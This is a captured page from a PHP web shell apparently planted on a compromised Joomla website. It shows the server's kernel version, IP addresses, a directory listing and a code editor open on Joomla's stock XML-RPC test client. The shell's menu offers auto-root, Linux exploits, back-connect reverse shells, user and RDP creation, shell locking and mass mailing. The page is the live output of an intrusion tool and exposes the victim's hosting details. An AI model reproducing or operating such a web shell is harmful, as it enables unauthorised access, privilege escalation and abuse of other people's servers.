Linux webm047.cluster003.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.3.20.39 | : 216.73.216.55
Cant Read [ /etc/named.conf ]
5.4.45
asmplong
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
asmplong /
www /
ancien-site-2019 /
poc /
[ HOME SHELL ]
Name
Size
Permission
Action
administrator
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
site
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
xmlrpc
[ DIR ]
drwxr-xr-x
114menu.php
20
B
-rw-r--r--
126menu.php
27
B
-rw-r--r--
200entete.php
53
B
-rw-r--r--
221menu.php
22
B
-rw-r--r--
224menu.php
30
B
-rw-r--r--
242menu.php
25
B
-rw-r--r--
289menu.php
31
B
-rw-r--r--
329menu.php
25
B
-rw-r--r--
336texte.htm
1.36
KB
-rw-r--r--
415texte.htm
7.22
KB
-rw-r--r--
506menu.php
28
B
-rw-r--r--
577entete.php
25
B
-rw-r--r--
589menu.php
34
B
-rw-r--r--
661menu.php
29
B
-rw-r--r--
CHANGELOG.php
91.81
KB
-rw-r--r--
COPYRIGHT.php
1.15
KB
-rw-r--r--
CREDITS-20250608081637.php
14.04
KB
-rw-r--r--
CREDITS.php
14.04
KB
-rw-r--r--
INSTALL.php
4.24
KB
-rw-r--r--
LICENSE.php
17.4
KB
-rw-r--r--
LICENSES-20250608102945.php
27.33
KB
-rw-r--r--
LICENSES.php
27.33
KB
-rw-r--r--
accueil.php
150
B
-rw----r--
actu-20250608122300.php
1.14
KB
-rw-r--r--
actu.php
1.14
KB
-rw----r--
asm.css
2.37
KB
-rw----r--
asm.js
1.09
KB
-rw----r--
bashrc.bashrc.tar.gz
190
B
-rw-r--r--
client.php
5.17
KB
-rw-r--r--
configuration.php
1.6
KB
-r--r--r--
configuration.php-202506080815...
1.53
KB
-rw-r--r--
configuration.php-dist
3.33
KB
-rw-r--r--
configuration.php.local
1.53
KB
-rw-r--r--
contact.php
3.33
KB
-rw-r--r--
corps.php
257
B
-rw----r--
expo.php
4.4
KB
-rw-r--r--
framework.php
2.31
KB
-rw-r--r--
htaccess.txt
2.6
KB
-rw-r--r--
index.php
2
KB
-rw-r--r--
index2.php
591
B
-rw-r--r--
menu.php
4.54
KB
-rw----r--
presentation.php
7.35
KB
-rw-r--r--
remplissage.php
106
B
-rw----r--
robots-20250608122659.txt
304
B
-rw-r--r--
robots.txt
304
B
-rw-r--r--
test.php
336
B
-rw----r--
titre-20250608164833.php
3.06
KB
-rw-r--r--
titre.php
3.06
KB
-rw----r--
titre.php.tar
5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : client.php
<?php /** * @version $Id: client.php 10381 2008-06-01 03:35:53Z pasamio $ * @package Joomla * @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved. * @license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ // Set flag that this is a parent file define( '_JEXEC', 1 ); define( 'JPATH_BASE', dirname(__FILE__) ); define( 'DS', DIRECTORY_SEPARATOR ); require_once JPATH_BASE.DS.'includes'.DS.'defines.php'; require_once JPATH_BASE.DS.'includes'.DS.'framework.php'; // Templates etc. are not available for the XMLRPC application, therefore this simple error handler JError::setErrorHandling( E_ERROR, 'die' ); JError::setErrorHandling( E_WARNING, 'echo' ); JError::setErrorHandling( E_NOTICE, 'echo' ); // create the mainframe object $mainframe =& JFactory::getApplication('xmlrpc'); // Ensure that this application is enabled if (!($mainframe->getCfg('xmlrpc_server') && $mainframe->getCfg('debug'))) { JError::raiseError(403, 'XML-RPC Client or Debugging not enabled.'); } // Includes the required class file for the XML-RPC Client jimport('phpxmlrpc.xmlrpc'); // Get default values for the XMLRPC server host and path $uri = JURI::getInstance(); $host = $uri->getHost(); $path = $uri->getPath(); $path = dirname($path).'/'; $host = JRequest::getString( 'host', $host, 'post' ); $path = JRequest::getString( 'path', $path, 'post' ); $debug = JRequest::getVar( 'debug', 0, 'post', 'int' ); $task = JRequest::getVar( 'task', 0, 'post', 'cmd' ); $output = ''; $array = array(); if ($task) { if ($path) { $client = new xmlrpc_client($path, $host, 80); } else { $client = new xmlrpc_client('', $host); } $client->setDebug($debug); switch ($task) { case 'list_methods': { jimport( 'joomla.html.html' ); $msg = new xmlrpcmsg('system.listMethods'); $xmlrpcdoc = $client->send($msg); //echo var_dump($xmlrpcdoc); //die; if ($xmlrpcdoc->faultCode() == 0) { $result = $xmlrpcdoc->value(); $array = $result->scalarval(); } else { print $xmlrpcdoc->faultString(); } $methods = array(); for ($i=0; $i < sizeof($array); $i++) { $var = new xmlrpcval($array[$i]); $array_method = $var->scalarval(); $methods[$i] = JHTML::_('select.option', $array_method->scalarval()); } $output = 'Methods<br />'; $output .= JHTML::_('select.genericlist', $methods, 'method', 'size="10"', 'value', 'text' ); $output .= ' <input name="args" type="text" />'; $output .= ' <input name="task" type="submit" value="exec" />'; } break; case 'exec': { $method = JRequest::getVar( 'method', '', '', 'cmd' ); $args = JRequest::getVar( 'args' ); $message = new xmlrpcmsg($method, array(new xmlrpcval(0, "int"))); $xmlrpcdoc = $client->send($message); if ($xmlrpcdoc->faultCode()== 0) { $scalar_var = $xmlrpcdoc->value(); $output = var_export($scalar_var->scalarval(), true); } else { print $xmlrpcdoc->faultString(); } } break; } } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="PSPad editor, www.pspad.com" /> <title>Joomla! XML-RPC Test Client</title> <style type="text/css"> body { margin: 0px; padding: 0px; border: 0px; background-color: #A69A76; } form { margin: 0px; padding: 0px; border: 0px; } .page { margin-left: auto; margin-right: auto; margin-top: 10px; margin-bottom: 10px; padding: 5px; width:80%; background-color: #F2EBDD; text-align: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; } td { font-size: 11px; color: #000000; text-decoration: none; line-height: 14px; } input { border: 1px solid #AD5900; background-color: #fff; padding: 2px; } .int_h1 { font-family: verdana; font-size: 18px; font-weight: bold; } .section_colour_bar{ height: 2px; background-color:#AD5900; } .ctr { text-align: center; } </style> </head> <body> <form method="post"> <div class="ctr" align="center"> <div class="page" align="center"> <div style="background-color:#fff"> <div class="int_h1" style="padding: 3px 0 8px 5px;">Joomla! XML-RPC Test Client</div> </div> <div class="section_colour_bar"></div> <table> <tr> <td>XML-RPC Host</td> <td> <input name="host" type="text" size="50" value="<?php echo $host; ?>" /> <small>Eg: www.test.com or http://james:bond@www.test.com/xmlrpc</small> </td> </tr> <tr> <td>Server File</td> <td> <input name="path" type="text" size="50" value="<?php echo $path; ?>" /> <input name="task" type="submit" value="list_methods" /> Debug: <input name="debug" type="checkbox" value="1" <?php echo $debug ? 'checked="yes"' : ''; ?> /> </td> </tr> </table> <?php echo $output; ?> </div> </div> </form> </body> </html>
Close